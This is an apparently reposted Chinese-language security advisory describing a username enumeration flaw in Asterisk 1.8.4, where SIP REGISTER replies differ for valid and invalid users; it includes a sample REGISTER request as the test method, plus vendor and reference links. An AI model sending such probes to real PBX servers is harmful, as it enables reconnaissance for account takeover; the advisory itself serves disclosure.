Asterisk SIP ‘REGISTER’请求用户枚举漏洞

漏洞起因
设计错误
危险等级

 
影响系统
Asterisk 1.8.4 1
 
不受影响系统
 
危害
远程攻击者可以利用漏洞获得敏感用户名信息。
 
攻击所需条件
攻击者必须访问Asterisk。
 
漏洞信息
Asterisk是一款开放源码的软件PBX,支持各种VoIP协议和设备。
在REGISTER消息中使用合法或非法的用户名,应用程序会返回不同信息的应答。攻击者可以利用此漏洞提交恶意请求判断用户名是否合法,获得敏感信息。
 
测试方法
CSeq: 123 REGISTER
Via: SIP/2.0/UDP localhost:5060;branch=z9hG4bK78adb2cd-0671-e011-81a1-a1816009ca7a;rport
User-Agent: TT
From: <sip:500@192.168.2.1>;tag=642d29cd-0671-e011-81a1-a1816009ca7a
Call-ID: 2e2f07e0499cec3abf7045ef3610f0f2
To: <sip:500@192.168.2.1>
Refer-To: sip:500@192.168.2.1
Contact: <sip:500@localhost>;q=1
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,SUBSCRIBE,NOTIFY,REFER,MESSAGE,INFO,PING
Expires: 3600
Content-Length: 28000
Max-Forwards: 70
 
厂商解决方案
目前没有详细解决方案提供:
http://www.asterisk.org/
 
漏洞提供者
Francesco Tornieri
 
漏洞消息链接
http://secunia.com/advisories/44707/
http://packetstormsecurity.org/files/view/101720/asterisk-1.8.4-sip-username-enumeration.txt

发表评论?

0 条评论。

发表评论